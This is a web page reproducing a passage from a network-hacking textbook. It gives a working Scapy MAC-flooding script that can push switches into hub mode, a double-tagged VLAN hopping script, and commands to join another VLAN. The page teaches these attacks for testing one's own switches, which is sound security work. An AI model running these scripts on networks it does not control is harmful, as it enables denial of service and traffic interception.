Menu
Home
Log in / Register
 
Home arrow Computer Science arrow Understanding Network Hacks
< Prev   CONTENTS   Next >

4.4 MAC-Flooder

Switches like other computers have a limited size of memory that's also true for the table holding MAC address information used by the switch to remember which MAC is on which port as well as its internal ARP cache. Sometimes switches react a bit weirdly if their buffers overflow. This can lead from denial of service up to giving up switching and behaving like a normal hub. In hub mode the overall higher traffic raise is not the only problem you would have thus all connected computers could see the complete traffic without additional actions. You should test how your switches react on these exceptions and that's what the next script is good for. It generates random MAC addresses and sends them to your switch until the buffer is full.

1 #!/usr/bin/python

2

3 import sys

4 from scapy.all import *

5

6 packet = Ether(src=RandMAC("*:*:*:*:*:*"),

7 dst=RandMAC("*:*:*:*:*:*")) /

8 IP(src=RandIP("*.*.*.*"),

9 dst=RandIP("*.*.*.*")) /

10 ICMP()

11

12 if len(sys.argv) < 2:

13 dev = "eth0"

14 else:

15 dev = sys.argv[1]

16

17 print "Flooding net with random packets on dev " + dev

18

19 sendp(packet, iface=dev, loop=1)

RandMAC and RandIP take care that each byte of the address is randomly generated. The rest is done by the loop parameter of the function sendp().

4.5 VLAN Hopping

VLANs are no security feature as already mentioned in Sect. 2.5, because the additional security of a modern, tagged VLAN on the one hand depends on a header added to the packet including the VLAN Id. Such a packet can be easily created with Scapy. Lets say our computer is connected to VLAN 1 and wants to ping another one on VLAN 2.

1 #!/usr/bin/python

2

3 from scapy.all import *

4

5 packet = Ether(dst="c0:d3:de:ad:be:ef") /

6 Dot1Q(vlan=1) /

7 Dot1Q(vlan=2) /

8 IP(dst="192.168.13.3") /

9 ICMP()

10

11 sendp(packet)

First we set the header including our VLAN tag into the packet and afterwards the one of the destination host. The switch will remove the first tag, than decide how to react on the packet, seeing the second tag with VLAN Id 2 he decides to forward it to that vlan. On some switches this attack will only be successful if its connected to other VLAN enabled switches via stacking, because otherwise they use port based VLAN.

4.6 Let's Play Switch

Linux runs on a lot of embedded network devices; therefore it should not be surprising that one can turn their own computer into a full featured VLAN switch thanks to Linux. All you need is the tool vconfig. After installing the required packet depending on your distribution you can add your host to another VLAN with the following command.

vconfig add eth0 1

Afterwards you must remember to start the new device and give it an IP address of the VLAN network!

ifconfig eth0.1 192.168.13.23 up

 
Found a mistake? Please highlight the word and press Shift + Enter  
< Prev   CONTENTS   Next >
 
Subjects
Accounting
Business & Finance
Communication
Computer Science
Economics
Education
Engineering
Environment
Geography
Health
History
Language & Literature
Law
Management
Marketing
Philosophy
Political science
Psychology
Religion
Sociology
Travel